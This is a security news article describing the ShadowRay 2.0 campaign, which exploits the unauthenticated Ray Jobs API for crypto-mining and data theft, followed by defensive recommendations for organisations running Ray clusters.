ShadowRay 2.0 attacks expose Ray clusters to a new wave of crypto-mining and data-theft activity. The keyphrase appears early and naturally. Threat actors now exploit a long-standing job-submission flaw to run malicious tasks across distributed AI and machine-learning environments. Organisations that deploy Ray clusters for research, training or large-scale computation face elevated risk when they leave control interfaces exposed or under-secured.
How ShadowRay 2.0 Works
The ShadowRay 2.0 campaign exploits a vulnerability in the Ray Jobs API that allows attackers to submit arbitrary tasks without authentication. Once the attacker reaches the exposed interface, they can submit payloads that the cluster automatically schedules and executes across its nodes. This process lets the intruder take control of the entire cluster in a single step.
After gaining control, the attacker deploys Bash and Python scripts that propagate across nodes. The payload drops a tuned crypto-miner, typically configured to stay hidden by masking its CPU and GPU usage. The miner uses Ray’s distributed compute layer to maximize output. The malicious scripts also block competing miners by modifying host rules or firewall entries.
ShadowRay 2.0 doesn’t stop at mining. The payload opens remote shells, extracts credentials, copies proprietary AI models and siphons sensitive project files. Some variants also include DDoS modules that turn Ray nodes into traffic-generation bots. Because Ray manages workloads with elevated privileges, the attacker inherits a powerful, high-trust environment.
Why This Attack Matters
Ray clusters power AI workflows, reinforcement-learning training runs, distributed Python apps and data-processing pipelines. Many organisations deploy them quickly and assume internal-only access. ShadowRay 2.0 targets this assumption. Thousands of clusters run on public networks or weakly segmented private ranges, giving attackers an easy path to takeover.
Once attackers convert a cluster into a mining botnet, they degrade performance, corrupt workloads, and cause financial and operational damage. When they access models and datasets, the risk escalates further. Stolen models may contain proprietary research, intellectual property or sensitive training material.
What Organisations Must Do
Teams running Ray clusters must take immediate action:
- Scan for publicly reachable Ray interfaces and isolate them from the internet.
- Restrict port 8265 and other control APIs to trusted internal zones.
- Enable authentication on job-submission endpoints and cluster-management interfaces.
- Audit cluster tasks for suspicious submissions, unusual names or repeated job scheduling.
- Inspect nodes for high CPU or GPU usage, unfamiliar processes and altered cron jobs.
- Review outbound traffic patterns for signs of mining pools or unauthorized data transfers.
Continuous monitoring plays a crucial role because ShadowRay spreads through internal scheduling mechanisms. Logging, telemetry and behavioural alerts help teams respond before the cluster converts into a full botnet.
Strategic Outlook
ShadowRay 2.0 demonstrates how attackers now target AI infrastructure rather than traditional servers. Modern clusters combine high compute power with weak access controls, making them ideal targets. Security teams must treat AI systems like mission-critical assets by enforcing zero-trust segmentation, strong authentication and frequent audits of internal APIs.
Conclusion
The ShadowRay 2.0 campaign turns Ray clusters into crypto-mining botnets and data-theft platforms. Organisations that rely on distributed AI infrastructure must secure their environments, restrict access and monitor for signs of compromise. Rapid action protects compute resources, preserves data integrity and prevents attackers from exploiting powerful cluster ecosystems.
0 responses to “ShadowRay 2.0 Turns Ray Clusters Into Crypto-Mining Botnets”